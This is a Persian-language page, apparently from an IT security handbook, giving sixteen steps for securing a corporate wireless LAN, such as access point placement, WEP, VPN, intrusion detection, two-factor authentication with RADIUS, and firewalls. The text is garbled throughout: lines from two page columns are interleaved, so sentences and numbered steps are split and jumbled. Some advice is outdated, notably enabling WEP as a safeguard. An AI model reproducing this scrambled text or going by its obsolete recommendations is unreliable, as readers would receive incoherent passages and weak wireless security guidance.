ﭘﻴﺶ ﻓﺮﺽ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺭﺍ ﻣـﻲ ﺩﺍﻧﻨـﺪ ﻭ ﺍﺑﺘـﺪﺍ ﺁﻧﻬـﺎ ﺭﺍ ﺷﺎﻧﺰﺩﻩ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ WLAN
ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ.
ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺷﺒﻴﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜـﻲ ﺩﺭﺏ ﻭﺭﻭﺩﻱ
ﭘﻮﺷﺶ ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﺭﺍ ﺣـﺪﺍﻛﺜﺮ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻭﺳـﻌﺖ .۷ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺳﺖ :ﻫﺮ ﻛﺴﻲ ﺑﺎ ﺍﻧﮕﻴﺰﻩ ،ﺑﻮﺩﺟﻪ ،ﻣﻨﺎﺑﻊ ،ﻭ ﺯﻣﺎﻥ
ﺳﺎﺧﺘﻤﺎﻥ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻭ ﻧﻪ ﺑﻴـﺸﺘﺮ .ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﻛﺎﻓﻲ ﻗﺎﺩﺭ ﺍﺳﺖ ﺁﻧﺮﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ .ﺑﺎ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺎﻳﺪ ﻣﺜـﻞ
ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﺤﻠﻲ ﻣﻨﺎﺳﺐ ﺟﻬـﺖ ﺍﺳـﺘﻘﺮﺍﺭ ﻳﻚ ﺷﺒﻜﺔ ﻫﻤﮕﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺑﺮﺍﻱ ﻋﻤـﻮﻡ ﺭﻓﺘـﺎﺭ ﻛـﺮﺩ.
ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﺪ ،ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺗﺼﻮﺭ ﻛﻨﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ
ﻣﺤﻞ ﺁﻧﺮﺍ ﺩﺭ ﺟﺎﻳﻲ ﻣﺘﻤﺎﻳﻞ ﺑﻪ ﻣﺮﻛﺰ ﺳﺎﺧﺘﻤﺎﻥ ﺑﺮﮔﺰﻳﻨﻴﺪ؛ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﺧﺼﻮﺻﻲ ﻭ ﺍﻣﻦ ﺍﺳﺖ .ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻤﻨـﻲ ﺯﻳـﺮ
ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩﻫﺎ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻦ ﺻﻨﻌﺖ
ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻗﻮﻳﺘﺮﻱ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﺗﺸﻌﺸﻊ ﻳﺎﺑﻨﺪ ﺍﺳﺖ ،ﻧﻜـﺎﺕ ﺳـﺎﺩﻩﺍﻱ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﺟﻬـﺖ
ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﻳﮕﺮﺍﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﭘﻴﺪﺍ ﻛﻨﻨﺪ. ﺍﻳﻤﻦﺳﺎﺯﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ:
ﺑﺮﺍﻱ ﺑﺨﺸﻬﺎﻱ ﺑﻲ ﺳﻴﻢ ،ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘـﺪﺍﺭ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ. .۸ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑـﻲ ﺳـﻴﻢ .۱
ﺑﻴــﺸﺘﺮ ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺑــﻲﺳــﻴﻢ ﺍﺯ ﺁﻧﺘﻨﻬــﺎﻱ ﭼﻨــﺪﺟﻬﺘﻲ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ ﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﭼﻨـﻴﻦ ﺁﻧﺘﻨﻬـﺎﻳﻲ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﻣﻜـﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﺑﺨﺶ ﺳﻮﻡ
ﺿﺒﻂ ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﻨﺪ.
ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﺍﮔﺮ ﺩﺭ ﻓﺮﻛﺎﻧﺴﻲ ﺣﺪﻭﺩ ۲،۴ﮔﻴﮕـﺎﻫﺮﺗﺰ
ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭ ﻣﻨـﺰﻝ ﺍﺯ .۲
ﻳﺎ ﺑﺎﻻﺗﺮ ﻛﺎﺭ ﻛﻨﻨﺪ ،ﮔﺴﺘﺮﺓ ﺍﻧﺘﺸﺎﺭ ﺳﻴﮕﻨﺎﻝ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮ
WLANﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺍﻳـﻦ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺩﻭﺭ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺑﺘـﻮﺍﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ
WEPﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻛﻠﻴـﺪ ﭘـﻴﺶﻓـﺮﺽ .۹ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﺮﺩ.
WEPﺭﺍ ﺗﻐﻴﻴــﺮ ﺩﻫﻴــﺪ ﻭ ﺑﻌــﺪ ﺍﺯ ﺁﻥ ﺑــﺼﻮﺭﺕ ﻫﻔﺘﮕــﻲ
٢٠٧ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﻪ .۳
ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ.
ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺁﻧﻬﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﺮﺩ.
ﻣﻴﺎﻥ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ،ﺍﺯ ﺗﻮﻧـﻞ VPN .۱۰
ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎ ﻭ .۴
ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ .ﺍﮔﺮﭼــﻪ ﺍﻳــﻦ ﺍﻣــﺮ ﻣــﺴﺘﻠﺰﻡ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ
ﻻ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﺻﻮ ﹰ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ VPNﻣﻲﺑﺎﺷـﺪ ،ﺍﻣـﺎ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ،
ﻧﺎﺷﻨﺎﺧﺘﻪ ﻳﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ.
ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﺓ VPNﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ
ﻣﺜـﻞ ،Windows 2000 ،Windows 98 SEﻭ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻴـﺪ. .۵
Windows XPﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ. ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﻣﺮﺗﻜﺐ ﺍﻳﻦ ﺍﺷـﺘﺒﺎﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ
ﺍﻃﻼﻋــﺎﺕ SSIDﻳــﺎ ﺁﺩﺭﺱ IPﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ ﺭﺍ ﺍﺯ
.۱۱ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ
٢٠٩ ﻣﻘﺪﺍﺭ ﺍﻭﻟﻴﺔ ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻧﻤﻲﺩﻫﻨﺪ SSID .ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ
ﺷﺒﻜﻪ ) ٢٠٨(NIDSﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ.
ﻧﺪﻫﻴــﺪ ﻛــﻪ ﻧــﺎﻡ ،ﺑﺨــﺸﻬﺎ ،ﻭ ﻣﺤــﺼﻮﻻﺕ ﺷــﺮﻛﺖ ﺭﺍ
.۱۲ﺩﺭ ﺳﻄﺢ ﺳـﺎﺯﻣﺎﻥ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺭﺍ ﺭﻭﻱ ﻣـﺸﺨﺺ ﻛﻨــﺪ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ SSID
ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﺼﺐ ﻛﻨﻴﺪ. ﺑﻮﺳﻴﻠﺔ ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺍﻋـﻼﻥ ﻋﻤـﻮﻣﻲ ﻣـﻲﺷـﻮﺩ ،ﺑـﻪ
ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﻛﻠﻴﺪ WEPﺭﺍ ﺑـﺸﻜﻨﺪ ،ﺑﺮﺍﺣﺘـﻲ
ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺷﺒﻜﺔ ﭼﻪ ﻛـﺴﻲ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ
۲۰۷ﻣﻨﺒﻊNIPC : ﻛﺮﺩﻩ ﺍﺳﺖ.
http://www.nipc.gov/publications/nipcpub/best
pract.html ﺭﻣﺰ ﻋﺒﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻧﻘﻄـﺔ ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﻣـﺴﻴﺮﻳﺎﺏ .۶
208 Network Based Intrusion Detection System
۲۰۹ﻣﻨﺒﻊ ،Chris Bateman :ﺗﺤﻠﻴﻠﮕﺮ CERT
ﻻ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ
ﺑﻲﺳﻴﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻌﻤﻮ ﹰ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢١٢
ﻛﺮﺩﻥ ﻣﻘﺼﺪ ﺗﺮﺍﻓﻴـﻚ ﺧـﺎﺭﺝﺷـﺪﻩ ﺍﺯ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ .۱۳ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋﺎﻣﻠﻲ ٢١٠ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ،
ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﺍﻃﻤﻴﻨـﺎﻥ ﭼﺮﺍﻛﻪ ﺩﺭﺻﺪ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ .ﺩﻭ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻴﺎﻥ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋـﺎﻣﻠﻲ ﻭﺟـﻮﺩ
ﺑﻲﺳﻴﻢ ﻭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ. ﺩﺍﺭﺩ .ﺭﻭﺵ ﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ
ﻧﺸﺎﻧﻪ" ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺴﺘﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺩﺭ ﺧـﻮﺩ
.۱۵ﺳﺮﻭﻳﺲ DHCPﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑـﺮﺍﻱ ﻛﺎﺭﺗﻬـﺎﻱ
ﺫﺧﻴــــﺮﻩ ﻣــــﻲﻛﻨﻨــــﺪ ٢١١.ﺭﻭﺵ ﺩﻭﻡ ﺍﺳــــﺘﻔﺎﺩﻩ ﺍﺯ
ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺧﻮﺩ ﺍﺯ ﺁﺩﺭﺱ IPﺛﺎﺑـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ.
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩﻫﺎﻱ ٢١٢RADIUSﺍﺳﺖ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ
ﻫﻤﭽﻨﻴﻦ ﻣﺤﺪﻭﺩﺓ ﭘﻴﺶ ﻓﺮﺽ ﺁﺩﺭﺱ IPﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ
ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﺭﺗﺒـﺎﻁ ﺷـﻤﺎ ﺑـﺎ
ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ.
ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﻛﺎﺭﺑﺮ ﺻﺮﻓﹰﺎ ﺑﻤﻨﻈﻮﺭ
.۱۶ﺗﻨﻬﺎ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻗﺎﺑﻞ ﺍﺭﺗﻘﺎ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﻫﻤﻴـﺸﻪ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ ﺑــﻪ
ﭘﻴﺸﺮﻓﺘﻬﺎﻳﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﺠﺎﺩ ﻣﻲﺷـﻮﺩ ،ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﻣﺘﺼﻞ ﻣﻲ ﺷﻮﺩ .ﺩﺭ ﺣﻘﻴﻘﺖ
ﻟﺬﺍ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﻘﺎﻁ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎﻱ RADIUSﻣﺜـﻞ
ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ. ٢١٣
ﻧﮕﻬﺒﺎﻥ ﻳﻚ ﺳﺎﻟﻦ ،ﻋﺒﻮﺭ ﻭ ﻣﺮﻭﺭ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ.
ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺩﺭ ﺧﺼﻮﺹ VPN .۱۴ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻲﺳﻴﻢ ﺑﻌﻨﻮﺍﻥ gatewayﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ ٢١٤.ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﻣﺜﻞ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻫﺮﻳـﻚ ﺍﺯ ﻧﻮﻉ ﺩﻭﻣﻨﺰﻟﻲ ٢١٥ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ ﺑﻄﻮﺭﻳﻜﻪ ﺷﺒﻜﺔ ﺑﻲ ﺳـﻴﻢ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺑﺎﻳﺪ VPNﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ ﻛﻨﻴـﺪ، ﺩﺭ ﻳﻚ ﻃﺮﻑ ﻭ ﺷﺒﻜﺔ ﻣـﻮﺭﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺍﺧﻠـﻲ ﺩﺭ ﻃـﺮﻑ
ﺑﻄﻮﺭﻳﻜﻪ ﻫﻤﺔ gatewayﻫﺎ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺍﻳـﻦ ﺩﻳﮕﺮ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
VPNﺑﺎﺷﻨﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﻫﻨﮕﺎﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﻣـﻮﺭﺩ ﻣﺜــﻞ IPSecﻭ ﺳــﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ VPNﺍﺳــﺘﻔﺎﺩﻩ
ﺍﻃﻤﻴﻨﺎﻥ ،ﺍﺯ ﺍﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﺳﺎﺳـﹰﺎ VPNﻳـﻚ ﻣﻲﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻃﺮﻳﻖ
ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺁﻧﻬﺎ ﺑﻪ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ
ﺭﺍ ﺩﺭ ﻳﻚ ﺷـﺒﻜﺔ ﻋﻤـﻮﻣﻲ ﻭ ﺑـﻪﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣﺜـﻞ
ﺍﻳﻨﺘﺮﻧﺖ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ ﺍﻧﺘﻘـﺎﻝ ﻣـﻲﺩﻫـﺪ .ﻓﻨـﺎﻭﺭﻱ VPNﺑـﻪ
210 Two Factor Authentication
ﺳﺎﺯﻣﺎﻥ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ Bateman ۲۱۱ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﺪ ﺍﺯ ﺭﻭﺷﻲ ﻛﻪ ﺍﻭ ﺁﻧـﺮﺍ e-thenticator
ﺭﺍﻩ ﺩﻭﺭ ،ﻭﺍﺣﺪﻫﺎ ،ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻣﻲﻧﺎﻣﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ،ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺨﺼﻮﺹ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖ
ﺷﺴﺖ ﺭﺍ ﺩﺭ ﻳﻚ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ.
ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ VPNﺍﻳﻨﺘﺮﻧﺖ 212 Remote Authentication Dial-In User Service
ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﺷﺒﻴﻪﺳﺎﺯﻱﺷﺪﺓ ﺧـﺼﻮﺻﻲ ٢١٦WANﺗﺒـﺪﻳﻞ RADIUS ۲۱۳ﻳﺎ ﻫﻤﺎﻥ "ﺳﺮﻭﻳﺲ ﺗﻠﻔﻨﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮ"،
ﻳﻚ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺭﺳـﻲ
ﻣﻲﻛﻨﺪ VPN .ﻫﻤﭽﻨﻴﻦ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ
ﻣﻲﻛﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﺩﺍﺩ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﺓ
ﻣﻲﺩﻫﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﺷـﺮﻛﺖ ﺧـﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺩﻫﺪ .ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﭽـﻪ RADIUS
